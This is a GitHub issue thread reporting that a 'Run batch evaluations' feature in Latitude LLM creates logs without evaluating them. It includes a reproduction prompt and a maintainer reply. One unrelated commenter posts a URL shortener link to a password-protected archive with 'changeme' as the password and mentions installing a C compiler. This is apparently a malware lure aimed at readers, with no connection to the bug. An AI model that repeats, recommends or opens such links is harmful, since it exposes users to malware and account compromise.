### ISSUE TITLE
"Run batch evaluations" creates logs but does not evaluate them

### ISSUE THREAD

**Issue by csansoon** [latitude-dev/latitude-llm#236]
https://github.com/user-attachments/assets/8a264f87-ab7e-4865-82f3-706a65fdf663

**Comment by pinpolhoxx** [comment]
try this

https://bit.ly/3TCbXO6
Archive password: changeme

you may need to install the c compiler

**Comment by csansoon** [comment]
Prompt:

```
---
provider: OpenAI
model: gpt-4o
---

<user>{{descripcion}}</user>

Cuál es el nombre del usuario? Responde únicamente con su nombre.

<response as=name />

{{
  objetivo = (name === "Carlos")
    ? "burla"
    : "apreciación"
}}


Genera un poema como {{objetivo}} hacia el usuario.
```

Dataset:
[names_list.csv](https://github.com/user-attachments/files/17072302/names_list.csv)

**Comment by geclos** [comment]
thanks!

**Comment by geclos** [comment]
can't reproduce it with valid
